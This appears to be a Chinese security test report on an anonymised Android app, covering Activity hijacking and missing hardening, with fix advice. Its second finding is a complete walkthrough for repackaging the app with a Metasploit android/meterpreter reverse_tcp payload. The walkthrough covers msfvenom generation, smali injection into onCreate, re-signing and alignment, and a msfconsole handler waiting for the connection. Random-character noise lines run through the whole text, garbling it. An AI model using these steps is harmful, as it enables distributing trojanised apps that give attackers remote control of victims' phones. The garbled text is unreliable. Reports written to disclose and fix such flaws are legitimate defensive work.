: m m, B$ y$ [- o 9 y6 f. v7 E1 ~+ X0 p; [
$ [7 a' [. @1 h ~7 w
9 b5 @( u1 U9 v( y
% x& j* B. C9 u
! D2 e! m9 P( G) ?, T
8 ?3 z) m) n7 X$ k
$ X( L6 _. B$ N+ d' W; W# R1 N; p. T% F! ]
2 检测结果 0 c+ w- u) g, U0 c: j- r( l
: L A8 K& y3 K) q; E
7 g( z- J. B* X3 x/ r) R) H2 {: e2 I1 Q
9 C3 V; v1 w' `4 T; f8 U S6 M1 L
7 F! p' f6 [/ k# D
2.1 某某某
. N0 J& Y' _+ m' x+ V/ l! G' Q. y9 U1 S
1 P4 m8 }7 r, B" s# W9 J
- k& T M0 m1 z9 l1 O- c ! o4 {! a2 J% |8 l
+ x" Q {$ d K7 Z8 Q
2.1.1检测目标 , H, l' J8 F/ L- x1 {! T
* s( e3 M" G( B# I: D8 A
4 r( D2 a- y# N+ ] T* W$ P
! j, [" `% l( ?6 Q; \4 k
+ w1 X4 g" j! m& M) B0 k+ `/ \! a6 Y5 V' U9 v5 p
目标地址: 某某某某某某APP
% Y z4 P8 C- p9 Y' a0 ~2 V$ a1 x1 K, a, {# M9 M
5 m# o) R; A* k! E# n h% X3 F/ R( c0 m1 H; u$ g
3 |9 Z9 @, E& m; u
6 }9 s; H' l# D! m3 f 2.1.2检测结果
/ M4 Z% ~* o B& J3 h" {7 g3 ]# h% J0 i3 P1 `
7 g3 l, G3 X2 W& d, D9 h: w
* ]5 c2 Y% u+ \. c0 Y
8 T+ V# E( q. h/ v' E% J6 _0 L+ n6 ~3 ~3 `# e# K# H$ f) J1 ~& O$ B
2.1.2.1
2 r& W8 T, t+ ]
) d# f+ l( u9 T) D; F
8 J/ F1 F' t; d/ }# i4 U& Q9 U+ M4 k. t( o' ~: ?4 u* P
3 k B+ c; z! l7 j( y6 x
$ U) ], s3 n4 b; g
漏洞链接地址:某某某某某某APP . X7 ?$ T9 m& \7 B7 e9 i
' U. t( C# ]# r+ u2 w4 d# V
, I7 B; u& h; h% T" O
; F N) }8 z) e& ]' z7 W/ h1 n
2 t3 B/ s8 K! `9 K5 Q2 ?) p7 }
+ ^: K$ a* o: R 1 h/ V7 R! N( n( M! t$ u
% ]. [& K( m+ P) K7 @) s2 k
3 U5 _5 M7 N" I8 |1 Y% c8 f# g' s" k( U1 {5 W
, F% i% T3 w' C& ^: x
- a' H' X- [* S) A8 G7 A- Q 漏洞分析及取证: - R9 o- J% n2 C8 Z V N" a
! ~: v7 q9 ~- Z7 z) O
, h0 x7 g) T, V
7 d+ b- {. X: V6 u$ z% k1 c 9 e% j; z2 _$ k+ ~& m; T
/ @. o; ]& m' H" l4 {. x 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: * {4 ?" ^2 l3 [& ]
5 x* R) G! J' _6 R5 S
' m4 h: q) j" K
( j; |* ^) H6 Y/ A 9 U. q1 I2 n/ z( L ]
6 M; k" `& [, K/ l6 x$ _) \
C, r, ?" [2 v7 N/ W' Y* s
6 C9 b6 Z0 H. _" @7 B. K
6 u; W) n% L# [% @; A/ ]9 A# D( t
' \ U. E; `7 I" ?: t. L* f
6 k3 m4 p# I' ~3 E0 t8 s& v( e2 D8 E }4 c0 q' h4 Q. P
1 k3 @' c' X8 ^: \8 P( w1 Y/ e( T0 K# m
3 t( I8 ^' F8 y9 r; H F- v
' K' ~! V% }9 s * f ~$ D/ N$ }7 n
- b0 ]6 a; D& J! F3 P- j5 f: l
9 p& m5 j$ O: f9 e& G* {: F; R9 O
8 f t, z/ ?: C. R& i# N. c
1 n7 A* G( S X0 N) ?
& _" l! ?' @# k' ]3 Q& g
+ u, L; j: I+ o: G: G' [
, y* p X2 H; P
% q0 ?1 G. a( B5 Y' g" O
" ]7 r' n, X" k- n8 ~4 p% Y4 v% ^0 C; V, Y# K
( M: Y* z" S% \$ g
0 K/ W. E s& v# ], |! e8 t7 C
+ f# Q" |: C; V6 v# S" Y4 \. P4 ^- Z
( W" t7 o: \! x3 j, U
! f2 d' m7 x" B- D + `; z3 M% L! j$ q S. f) S! x3 u$ s
8 v7 |* X' G. u5 w- r4 g# t1 v( y 漏洞危害:高
+ K2 @' J! T8 U2 q5 v2 b# U4 l; o; Z: `1 b! `, p
" k1 o7 H% i4 v8 N
$ d' f- v, u0 h% x/ G+ W5 _0 _ 4 T9 p: `% v w4 Y& u8 \6 |0 y
9 ?, Y0 d1 G) `
4 {/ |7 G2 r5 Y/ ]% X
0 G R( Z, D u& ]6 x$ O& @
$ D: S' l x6 w9 Y. r8 L2 f
4 l) E4 c- b9 n0 a; S+ {# n3 Z& H ) i2 {: M; H6 x/ t4 R+ ]9 M' K
$ e& T2 E) G" Z3 {/ m- G* \$ ]3 L | % C( D: I0 i5 n9 e6 t
* V; B% r/ i/ f% d& n" o # v" H5 j' D1 H0 N6 N
- R. }, k* ?, u9 q! t 严重程度
9 S' U4 i: `/ w8 t. h0 c7 H( C: l, k9 C# O8 ]& q. J1 A
: F: C$ V/ P! X2 B5 q' i
6 v* e$ w% ~! V8 j: q" I) |; u/ P |
; Z$ L1 Y" ]: C0 ?$ E
, R2 b3 A# J: l# W# y/ f
+ x. o& N+ i8 V) y- t e, L) ~
$ f3 l' F; o* b& ^1 N) J - S! U% Y# T8 c
: h1 h; o: S' |1 { 高 - J8 j" K1 v) z4 t6 N3 O9 r
" J3 s% G% W2 T) _
. ?# Z- ?& \9 e6 y% y$ W+ i4 @! \& |7 y% A' c8 ?5 G, w6 G8 j7 c: t
|
, r9 P& S; u, J! N0 z: v8 s; ~. A. h: c, G8 t
) H# I" b- M( y7 H( O) r
0 _* h' W0 A# N+ E) R j & J) ~* R" B6 m& c1 M! M
w7 X/ C/ V2 q ■
/ R. a$ c5 j5 w' g
1 D; Y$ k( T1 P* E
, a: r+ w8 q% B! N
$ [+ @8 T+ o: |9 Y6 z2 E1 p+ l! G | 6 z0 e* A4 F+ l# A
" `+ q# L' }$ k( f* O) Z( | / t& R% z( n/ E4 C& E! j S/ p7 u
" ^( q6 ^+ D- H9 H
, y0 h5 _; s# \$ K% q
; [9 |% X& t" s! k 中
7 C4 S8 `$ A' s ?, A) U; \
4 A# X" R; Y% d; c9 c& s# [6 }& L4 V
6 m+ F( V5 y3 U% ]5 F; b' h* d$ \. s% `% o2 i
| % [! J) a& R( `( N
; s& a' }* S9 ^8 \
( \* [8 f: y/ W
9 a- [& K; T' B5 Q) I * S( n% f% p0 U" S& e2 ?
5 b5 x- Z( P1 \! ^, Y
! b- F+ V( F9 j$ K( }3 s, u2 h3 c
& h3 `/ a+ e6 n6 S6 N( V3 q
% q# a q$ B4 ~0 X3 U2 T# }+ v |
# r: C+ P! {9 P/ ]* D8 t( l8 z1 u9 L) ?+ _$ v4 S1 o6 w6 [
9 l# {- e$ \1 x
% q5 u+ ]6 c/ Q- t1 f! l3 n+ { ! R- `' S# L' P: _
! U; G4 A# W3 ?$ ?) F 低
- ~' p$ N8 d, ?. {, j0 _, n
$ |( |+ e& w& G, u n: G $ p% }: |8 l* Q R7 o
2 B7 s% g+ A$ m! _1 P. Y* u2 g: ^
|
3 U9 m4 | D$ u2 ~
6 O9 w1 z6 ]1 ]1 x- r- a . |3 h) |% w% q( R% h+ f( A g4 Q
) J/ k) ^6 W; P. \
* k, @: R' ^4 }/ c. J
3 o# m# Y8 ?; j! v+ p& {' Y8 J
8 q& w; D6 v# X( V5 W) B
# H7 N3 |/ r9 o
& R2 t, h3 i3 \$ X
7 f4 ~' D. @- R9 P' i |
4 b* q. E2 j* t. A' U* Y
2 i C6 S4 u3 |
) }3 C; z' b. a1 q: i* x6 f
. |3 z2 B7 z. R 0 \$ \! ?8 w' g' w
0 F" D+ x, h4 n6 e' a7 Q" L2 K
8 X, z( k, T7 L C! |6 ]* r7 ~: ~% E
4 C/ M: m7 S& f. @6 e 2 c" j+ q$ i7 J2 F
) _8 K, ?/ | p& \
* B! j& i3 o1 V2 I
6 P% M, E4 \2 S$ W0 X
" l2 m: J# D4 T9 i" V$ m+ f
$ ~2 B' c7 f" L. o9 \
7 p& a* X7 R1 `% Q" t, i/ a1 j |* D- |, r
. n1 M8 N4 E1 I# m! C6 ^
4 Y, u% `* `! P+ `; E @ 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 0 d7 G% _! S2 g* @9 L( ]
7 X6 f, [6 E' o' }( N4 D
: F4 T x- [2 a+ U7 K* K% O" m9 ?' [
- t0 o3 N- [4 y; ^1 g {7 e( i8 P2 ~. c$ q! L$ p5 P
( P) ]+ v; V6 p$ H' k
9 x8 X$ a1 u# W. K
& Z7 V6 D% b; N4 F W
' y: }# }; f+ x5 o" a }
& D! R4 [! H- ]& K6 m- m. u$ a- i- O4 |1 z1 v4 K9 o6 y
- R6 J* d" L V! _
2 P, ^8 N) ^( l& ?% f* y* S& k6 \
6 j* x1 l9 I. W2 J+ a: P% H
6 p& `+ l& @ _) O5 O
/ Z3 E/ B3 Q2 e6 B( ^, c6 q
6 f+ F! _& t$ \! c# H; C. k
2.1.2.2
4 A) }6 Q8 Q$ D, v/ g9 E: F' b! G+ G8 I2 J4 Z! u* E
( m& e2 t; b+ `% t U9 r. k6 b! k& d1 `( E# b l
& C0 F3 F. E. d% v D3 T+ n2 q" R# `
漏洞链接地址:某某某某某某APP ) ?/ R5 T8 L, p1 }) |& @
' \& J0 {% h7 @/ H
( z6 z) I# Q) _2 e# L, B( w& t9 D
6 ^: r. R+ }+ z7 [, R4 l, ?+ [
, N/ Q# @1 O5 t n; _) i( ~
- K# S( X" d, Y8 m6 z; P4 g
漏洞分析及取证: ' E" O/ |: Q8 g3 ]/ O
! N9 z3 Y* O/ E" B: v' l
0 A. |. z) _/ g* T" J& l* C5 ^6 z% k; U: M0 E4 Y7 Z7 a! U# d
3 y% ?1 N7 V# }& T' Z3 ~9 r7 Q1 F b
: Q% r9 D( A. B0 L, c# H 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: , B. g9 U: u0 O; ?$ w
4 v5 S2 h& h. z. |& H
" I4 Q" T0 Z# a' }& q2 `
0 d0 U4 M8 U- h# w9 M7 f$ y$ t% ^ 0 r3 h5 J# A p" T" l+ N
+ j3 b6 D1 k. W8 d2 u( ]0 f 用Metasploit 生成木马 apk 5 A R1 V; Q& c: {
$ A7 `, e1 i2 l! l5 a k" Q
( p) P2 E8 a; P* O6 g7 }
& t- N/ p2 O+ q6 X1 ^# N E2 j" h
0 `" [, M" K6 X% m
# V9 |2 ?- [; v& V1 i9 p
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
, l) g/ v4 M4 z! q2 t; X) E& u! A
8 H- W$ ~: h2 @7 `
. m$ F" `8 i/ | s/ B M5 z+ S5 G( ^0 Y
9 m* c, a2 V. C/ w- z+ c
$ ^" N9 U& j: l& @9 b 反编译目标apk和木马apk 2 `8 G% B: c0 Y4 c$ |" G1 d7 s
6 }2 B; `4 d4 o5 Q/ n& j
5 k' x6 u* T5 ^# {0 _5 e" H$ Z5 D* Q
" b4 i v9 X9 H- ] , Y/ z, o. z0 h; K
R B8 R3 J- i, {) h$ [
apktool d target.apk
7 J4 i4 U1 Z1 P4 t$ O3 V1 o& F+ Y
3 ~+ T& t7 L0 b; t* n. i& `
apktool d cockhorse.apk ! R$ G, j2 ~1 B: T8 J# f& }1 A$ F
& P, I. D! G$ c: v, @
5 P) b8 x# s9 Y
7 X% D0 I) v4 F9 m0 r7 Y! O
5 {9 {0 M V5 [4 B& O' O
2 i9 G1 ?: t' U4 N4 z2 n; b/ ]1 u* a 木马 apk 注入目标 apk ! W1 U7 A8 ]3 z) }5 g9 }3 h/ t
# x+ p6 Y e) s' Y) F- X
* R. v' `6 t& ?8 Q& X1 ?; `7 B8 x6 q
, M3 a& m- h. V- d/ C6 `5 s0 I/ y
( [7 b& E9 P) n$ }/ k 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
: k y! H! E; ~0 Y, |
8 m, {" y# c! _6 e$ k V
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 7 z G6 d \8 \# I% D
) Y. n; i, t' S; a! D5 Y7 u! r
- c- I! m6 _: y: y, G, v+ }
0 b$ T8 P# Y' g+ W! |2 J : E' `% l& U& {1 a7 `7 l# V* n( z" n
! M7 R$ i, R$ ?8 [% O# Z
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
4 ]: G* X& b, A2 z0 z1 k# p$ M* A" z9 ?& u5 Y
* O4 _: O' ]4 K6 Y; ?) p8 K; V5 z
& `0 Y# j7 ]6 U; J6 c2 n1 [
2 Q! V* z, W5 v' H" L* y+ X$ w# ?( l6 o) v# F4 c
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
& r1 j9 x" ^* K# j. O% P
5 M, |; u6 |' D0 W
* \/ {7 w0 L+ y- e+ j$ C
C" e8 s! o' A, Z" r
( l y! U& p. H3 s# k l A/ { h: m
回编译生成最终 apk 7 `6 r6 w( q% E5 J
+ H$ L( Q& [( p( E7 C' z
0 k# G$ i+ p( Y! S4 t9 R: x
1 Y5 T8 [+ z* }; B- y+ } X0 c$ y+ i- Z$ b: e" ?; D& L5 y7 X
) h7 x3 s9 u. Q9 n/ s# n
重新打包 . R3 m2 G. S& W* m. ~
! w9 b5 B5 O+ I* f/ Q p
' p: p; S1 ?$ }4 F% ^) g
& X' `3 c* Y# w1 h9 @" S U7 d- S
a, v/ Y; S7 r" |6 u" Q& w. ?& E
6 b2 p7 V* D; C apktool b -o repackage.apk target_app_floder 3 J- C& j; v% o M' b
. N( ]8 w8 u: s0 q% q* J# g/ e
! z- D$ z1 ]3 }6 M0 n" [9 X
& i. c8 T3 @0 `0 ? ! y3 Z8 B) W2 E0 B2 E0 P R% V6 |
( v; p j6 J3 c1 i
创建签名文件,有的话可忽略此步骤 $ t6 F5 j8 e, Y
5 F# K% z6 T3 _2 ?# c' E
_* j3 E: U7 i4 M
9 J5 |; F* o3 d @7 }# ]0 F
6 M" }, m1 Y' \/ E; Y
0 ]% W) a( s5 I keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 $ Y, N3 I6 q v6 K" \* f
$ D3 p0 |- W! X. D) O0 z
8 @& {$ d: G) Z9 P# L# e, U0 g
1 y' J& k1 j) \$ d3 { 9 N, O* k* R# ~- ~8 w
0 f; o0 v2 L3 J; ]8 L; n# {* J
签名,以下任选其一
2 u' i% B" b2 C; z' ?- f+ ~1 p5 K& z. x; Y$ W G, o
9 O2 a2 H& u9 G
+ I- i) ^) f+ z* M' b# c( n8 I
+ x7 t* J) r' H6 T2 a. g% k8 S
% A# h1 G3 Z) y9 _8 z( @# {/ w jarsigner 方式 : i6 n! d+ ]8 d; o5 ?; @4 e
5 ]$ u+ X3 f+ ]" F5 l% w
% P f0 n; r2 C, n% O0 d
o' ~0 X* D( `
8 i4 Y2 B# e7 J2 {/ I# n, U2 ^' n# O# F
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
+ [( T) e. ?3 k% x: ?7 w( |! b8 o
& s0 h9 S( k$ o1 U) b- g% I! o9 p8 r& i5 R1 X
9 T& \- Q. k/ N" m$ U- m6 \ ~7 Y0 V" ~8 V
+ ]7 \+ a" B+ ]: ^4 j. _) L7 z
& Z6 c' D; n6 e9 I apksigner 方式 9 A& i+ g( r2 e
, q1 V7 O! }! F' w
- O6 v* p5 n+ ]5 e+ T4 _8 p( F
8 o' C- D# v1 G" ~3 @ ( j$ y# \0 ?% E! t) D
0 s7 f4 h4 l7 [, O9 c apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
. q3 I6 N2 f Y/ G" t* y/ J/ c; b/ P+ x2 h( u' q, t
; h8 I0 G: D2 f; S* z3 Y
& d8 J4 m! N% v# }; X1 z
9 B: G+ K7 W& [( O( W* W7 W& n% h. A; I% y( B
如需要禁用 v2签名 添加选项--v2-signing-enabled false 9 y+ u5 c7 X% h# U: D
. V2 d) D4 B5 Z7 [9 X* L- [
/ z& h4 }7 Q& S+ Q$ U0 e1 W, l& a; a
. D, q0 k" K, |, l
5 B9 P& @0 c" Q' S) p 验证,以下任选其一 8 R3 e& O& o+ @( C% [9 ?, z
4 m2 W% e0 ^: l2 z( e5 f5 u
4 {: Z) E( z% K- C5 @+ K1 l- r/ [& w
( S9 {$ E: h% {/ ?' R" h
, A% w2 X+ b" i1 f% x' ?- n+ A! y$ a9 ^3 G u" t- d0 d+ g
jarsigner方式 ( X6 F8 J, m8 }+ E- D+ {* C
% G. d9 _- D2 f3 _* H
2 w4 a3 | r8 D/ P L
7 t% R3 r' O* s) {- [
* n/ j* Q2 M: Y V0 G6 p, |" l$ o$ ]! k+ J
jarsigner -verify repackaged.apk
+ E' F" E3 g0 U8 i- J) U, x6 X5 ]$ i* R5 V
& {# n+ J1 o U- ^
% B( m% E0 Y7 g- J; Z
# F+ P( q- E' I4 s; I( e, C! Q
* k" g( N2 _. Q apksigner 方式 8 _' t( c5 I2 b: z& Z) K9 ?
3 A3 V ?% c/ v1 H' B
3 p6 j3 ] |8 Z; p/ b6 o
, U8 h4 [% ]6 |. z8 }
4 Q6 z0 S) E& r* B+ G
/ l4 d" U% b& w5 s. G) u+ a, j apksigner verify -v --print-certs repackaged.apk
: T3 x3 E3 o# T g @; _4 S# G, E, z6 V6 q0 z& E. o3 W* e
" u) f( r/ }# d; U9 g
4 I' m! u2 k2 W% V # F' q7 A- d( M4 S+ ~) i$ r: ~& f
" L3 D% l# V# F0 N6 g0 X9 c- q$ k keytool方式 6 {) j' J4 U& \0 p' A, k( R$ g" X
) j9 l/ r2 ?# |6 E5 T
- ~4 p3 t5 ~7 \( Y
8 X J6 G& b2 s& d! k* B3 f8 H; w
2 e3 @9 j/ f% p+ B# c0 D
" R `4 L; j$ }8 R& V3 K keytool -printcert -jarfile repackaged.apk ( {7 n; M x, o3 W1 v6 O
0 Y; Z2 L8 H9 k* ~8 f4 s9 r
% S3 ^6 F/ m6 Z ?
# W9 F W; Q* H' j1 u
* {( [9 B: `1 Z4 s
; H, j0 ~ E: l) R1 D 对齐 * x9 d# T. V+ D' D/ U8 t; G$ C
6 j* z2 y. Q9 h/ {- y
1 Q; f1 m( _8 L3 I) [1 r
. p2 J* W8 B5 k7 f$ d
; @; h% ]" Z, F4 J$ {/ N6 F
( a4 \% S% {& `2 Y& r 字节对齐优化
; g+ w5 g/ O/ `3 c, i- p& X/ O+ X( _. p! _) p
' @8 N" f6 w. D1 ]$ p8 l
) [6 V6 R, [% J
% _7 i( ^- x3 u2 e- S
6 g& D1 F8 d, Z+ E zipalign -v 4 repackaged.apk final.apk
6 M4 k, n* x$ ], [9 v0 D n' t& @7 c- i( q {& @9 w
8 _% U/ k( X$ x5 ^; F; c8 @/ m& U; v) b7 \% d* b1 Q
! u- q' T/ U' U# q! L: b1 f2 s. [6 c$ H) T
检查是否对齐 , K: {3 L' g* z
' X G8 p5 i! E5 J
, D- P0 U0 A9 Z+ R4 g
$ Y1 \4 Q7 z4 r. Q
+ ]6 k( }5 j% ?# F7 V1 H- D6 v1 x+ \1 `4 S5 Q
zipalign -c -v 4 final.apk : p% b& E9 C y2 W% ^7 B7 n
: P. s2 N9 U4 m, G$ C5 I& ^
# X# q/ L) w- F4 @; v" p, ^ z0 G2 P1 Z) W5 E# Y% A$ \% `
3 l& q, t4 V) ]- u' X: d, [+ k( p: Q
' Z5 p) }! @ E+ G& o 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
3 H, w N2 e8 z) r2 j9 K) x# F+ u* g/ U9 P2 N
2 O$ J! Q; P! K7 A- a% T% }3 T0 A% x" |6 b
0 z5 Y5 c" J+ X9 l3 L- ~8 B$ u) A: `1 X/ t& W2 q6 i) p
启动Metasploit控制台,配置参数等待上线 $ Q! d6 ?6 R+ ^/ H0 a
( K4 A- a8 W: G) D4 x. B2 `
7 @( ?$ K: K/ z" \9 e) X+ f3 A" ]# b J: h
) T/ T8 Z3 K) w% \5 |
4 d. M( b: {$ [! R; o 在终端依次输入如下命令
1 @& Z1 H1 H, b3 L& E( m! s# _
9 x) \; u1 B( ^9 N# X7 o5 ?; C
& D h8 l. i" Y, B
' Q( K* s# m1 W$ O H; c5 t3 ~# q 3 o# p3 ^# S1 F0 d c
; a! u* U- U$ P; q0 S; E msfconsole ! P' {; A Z3 I; Y& v) G- G
2 W& e4 e" s# j& i- n" ^9 u) S
% ]: i( p e+ u. d( l, N3 n0 A. q( X! [9 T
$ @% R, M* L, M% w9 }
5 w# ~, W6 q* R9 ` S! v* I8 b use exploit/multi/handler `. [& k/ C* j2 O
8 Q. R: q% B' M' E) l4 w
# o6 }: [0 N0 {3 s
) p4 o& |; j8 Z: M+ V( j6 |
8 X, u. {3 {4 B$ S# s. `0 h
/ Y- E& r1 _4 G$ T set PAYLOAD android/meterpreter/reverse_tcp
) P5 n& W& L b( h+ M+ E8 Z$ |% C: e$ H( a, ?( Z( I7 z+ t
. g6 L1 Q8 j& [/ r. Q
5 U' @" F) R6 F) R5 W @
* X7 m8 R8 l4 o3 q
3 H# N9 W3 ]. B' f2 v, Q* R" {4 R set LHOST 192.xxx.xx.xx
3 r$ ]- J3 D) w9 D
& @2 g9 N* X% ]
2 W) D3 b9 Y: l! |: z3 W* S
3 v2 B4 T, i" Y% ^3 S% D ; ?) [1 e3 S& D/ T! i2 H
% d# r$ F( B( m set LPORT 4444 ( u& m; C2 ?: n& }
2 c' F! j: [6 I n
8 I1 P$ _" m! T; X8 e D2 _* z# ~! z' C. J( K- L2 ~# r9 n
8 \; f! Y4 I& f) _* Z7 G' W% L" w
exploit ) {) ~! u* S, f
% w; w! ?, e4 i7 h# {/ W& J
1 Y. E$ W% N& k. U6 {2 t0 S
$ Y! k5 I6 s/ m1 c8 p I
* _9 E9 J2 M3 a( ?* _3 U0 }# b) |
5 z7 h) }4 C& _% l9 | 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
" D$ \$ X9 @7 B& g# ~8 X: B! l- c7 M- i/ p9 M# B
& M) J- ]1 k# K8 h/ r) `. B% X( V& V- s# w7 ]5 E0 R8 c4 L
6 R. W T9 Y; S3 I& i/ o. X+ V1 v" ~' ~5 z k' g+ J
漏洞危害:中
5 D% z( r) ]! a
' B z; W$ k0 H4 n
, ~. u2 m7 _+ V
( J: G6 O/ U5 C% `
. L5 f. T: D x( m) I
8 Q4 F: `8 P) g- I1 ?7 G6 D
* }/ D1 D( E& K# n) n3 e2 R, z& x8 K6 G& D$ U9 a
' ~+ W) \) C! H
+ G9 e9 Q% K( p. l% s
c( c& s4 `$ \, C* `+ n$ m7 T9 {) q. E1 |. L6 \3 y' Y
4 x2 H3 ~4 v: N4 ?' ~+ P
" [4 a& a- J9 `) C% T: X- @ |
+ {9 @% \. `1 e, U9 _
: ~; h2 [. \" I ; r* u5 D: j& V
: l" ^; m+ Z: W/ K 严重程度
, F! l* { s" t
3 G2 D5 u$ t- F7 c& h/ e( h- t 9 W. V+ h9 t( s5 y' [! g
' x0 U- \3 _' _3 U ?# c | + [' v! }; ^+ B: u, ]5 t
# z/ @1 F8 ]) N4 Y 4 Y! P$ d- Y; }8 Z: @; n
) d3 F4 O C) [, j+ g, w2 ~5 i9 T+ ?
% h6 Y8 w0 H3 l9 ], |+ @
% i: ^( c8 G3 U- n$ i. w 高 : S0 l/ _1 ^: b3 c3 i' a2 t
. S$ W/ G R9 U. C& J9 R! q# |: ?
! S5 f% p$ @ o) H
. \. Q+ P, W: g2 q3 E+ X7 m |
- @" b; Z* C9 Q5 ]) C
% H- Q7 C$ d2 W: m( a( I, U
! N) i% A. @# ^( _# ^6 D9 q, j% d' g8 F
+ D" _2 |* C+ |- ]& D7 t
# R( e1 O* {, g! w' E; `
■ : {3 W) N8 X2 H' H& ]% `
+ @& u7 z1 L) { # i9 Q$ T/ d7 d5 ?
d3 L/ e# C/ i! K4 i! n; l
|
' w2 ?' p# ^) Z6 F W" S" [: R/ J4 i* X6 s0 r, p9 `
' K6 t3 O( z/ V. D
3 V. }- `! o' x7 _2 p9 M. p
T. P0 C% C# b' Q
1 F. a4 h( M; u7 x 中
" E9 l: d/ b7 `% S
9 o* K$ v6 H: \ 2 u3 S4 K, o* p
1 q0 w4 ?/ [) i
|
; b( k- J( W% S [9 c9 p0 i0 u1 [, ]2 `# ?4 q! ^
1 }0 l6 ]" ^, P8 y+ w" Y, L
" q) G: l& U) `9 w+ D
. c0 m; v$ B2 s7 f0 d- e
+ [0 Q1 D. r/ u
; d6 P# k. Q" |. V9 W9 l8 w4 T4 Q5 a" n: `0 ?. z& q
, g* b+ c, G! E+ z* v, i1 ]: `; C
! X6 `$ A3 \$ m# I1 \ H5 a / {% L& b9 z3 L/ y; ]$ X
( E; _8 c' b2 `- I+ V. J
|
! M/ r& h" y# |- z8 L- G4 u5 b
2 }0 I$ o$ N) r- b o3 v$ m- k3 L; t
1 d/ e0 \' O1 f1 G
' B J7 E% a) e9 S1 s . i( D' {8 d) j/ n; X$ m0 v O
x. E5 W) N% U9 _2 F; H* A
低 4 C; O! m( Y" p! ~ Q+ d; d. R
* {/ I/ [% V/ J4 R+ h5 D
9 r& M) W r& m2 s7 H. \5 C. E4 L% \) _# x4 g7 ]6 v1 J
|
" l) W& F/ W: g2 g* @* L( @" ], V! R! j! B8 b' {1 x0 B5 s) i
# e& J6 y4 [8 l4 ^+ I9 |
( ^0 L0 ^- e T; v; _% t) J4 D
5 Y6 h5 d9 u7 T! n; m* O; o+ F( y4 f, W. F$ B& q
) W$ d# s# a0 E3 U$ k' [' v7 i
6 J# A+ d# ]5 i4 T" `
9 i2 W5 P5 V) p7 b7 q- H U) \; S
) {9 D- {9 q) f
o- v T1 U8 w9 _9 M8 B' D
|
! x2 b$ [0 r" V% K
6 K, J% N$ r! B: ]& t- K
# U" V9 F* J* x, N
* n7 V! i6 [# w9 }; B% F
3 m, q V1 t# x* e- k+ v" g* P8 x m
$ [0 t9 R- Y: V' K* w. a( N
) K2 j1 R- W! ? s1 f6 `6 F
* P/ s8 I5 u' K G7 c 9 m1 H1 ^" K* _0 X
: Z, Q9 R) u7 E; { 0 n- |' C! c9 G0 j
, j6 U: |3 W# S# ~# |& ` 5 ^: D) @- D0 o+ u- e9 {
7 n+ L* K* }2 M4 t* L$ ~5 V
+ U$ M# W) L; `( V+ s1 B. u( o6 n, u6 z( W. E
" R! `% N/ J) W5 `1 ^. _+ a0 @9 G+ i
' c' l3 f+ f4 d$ t1 x |3 h' H8 ?( { 修复方法: : }+ T7 K: o: u3 X0 C/ u1 i& k9 A* J
* M) f6 }1 c1 Y5 \! ]0 U- y
) `# o4 \4 w Y1 O6 F; R
/ L0 t8 O: E* Z* X0 o& w
! r+ w# m2 C( W" d1 G! q: L, H1 t) x) s& E2 I$ h4 j0 u
1.在 APP 启动时应做签名校验防止二次打包。
V. }- @- t* D$ q: f. K* b
$ C$ @7 E1 D* ` 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
) l* ]1 v1 J1 r. M
- S0 }. v: f+ g
6 Z. Z) u+ o2 g7 y6 {* d1 A! l- u0 r& ~' V- H) |' I. S
- U3 W& N% I- C$ x6 i
9 w, y8 `$ N) N6 W + s" }' h, m8 M7 B$ e4 B* A
: R% r; ?6 V! `7 U3 x3 [; f8 ] 6 K) r" u5 V! ?) N8 s6 N' ]
+ C8 O) E- n0 M+ J8 [
5 v- C9 L6 h. `1 H0 Q8 |1 c
) d: {' x; C3 j0 {2 D2 p
/ {; u, q0 O" d% f. q$ V- H. Y6 T' C5 @' q2 q8 X% i
. O% L W. A2 s( w" @8 l q+ b
/ F7 |1 I. ~. j! r
- L& L9 U# `# h
" p4 E/ i5 a5 S: [: k: [- c, t" K
. g+ P, {6 s. `. D
# J4 K/ M4 v" U- }' G